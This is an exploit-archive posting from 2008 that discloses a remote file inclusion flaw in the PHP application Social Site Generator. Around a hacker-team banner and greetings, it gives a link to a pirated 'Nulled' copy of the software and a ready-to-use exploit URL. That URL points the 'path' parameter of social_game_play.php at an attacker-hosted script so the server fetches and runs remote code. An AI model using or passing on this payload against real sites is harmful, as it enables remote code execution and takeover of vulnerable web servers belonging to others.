Social Site Generator (path) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Social Site Generator (path) Remote File Inclusion Vulnerability
# Published : 2008-05-31
# Author : vBmad
# Previous Title : EasyWay CMS (index.php mid) Remote SQL Injection Exploit
# Next Title : Joomla Component prayercenter <= 1.4.9 (id) SQL Injection Vulnerability

< ------------------- vBmad ------------------- >

############################################################################################
#
# Application Name    : Social Site Generator
#
# Download               : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type      : RFI (remote file include)
#
# Dork                       : search it :p
# 
# Vulnerable file         : social_game_play.php
#
# author                    : vBmad
#
# Team                     : nab3 Team & hamama team
#
# Greatz                    : ALLAH
#                                   rouchtekh & jonelo & okx all hackerz moroccan    &    bigg thnx to my teacher Roi-PhP
#                               www.nab3i.com     &    www.nab3.2007.fr   &    www.maroc-mp3.net
#
#
############################################################################################

< ------------------- vBmad ------------------- >|
        /                                                          |
      /          uhh@hotmail.fr                            |
    /__________________________________|


< -- Bug -- >

Exploit :

http://target/path/social_game_play.php?path=http://Evil-script?

< -- Bug -- >

#The majority of the versions are infected

# www.Syue.com [2008-05-31]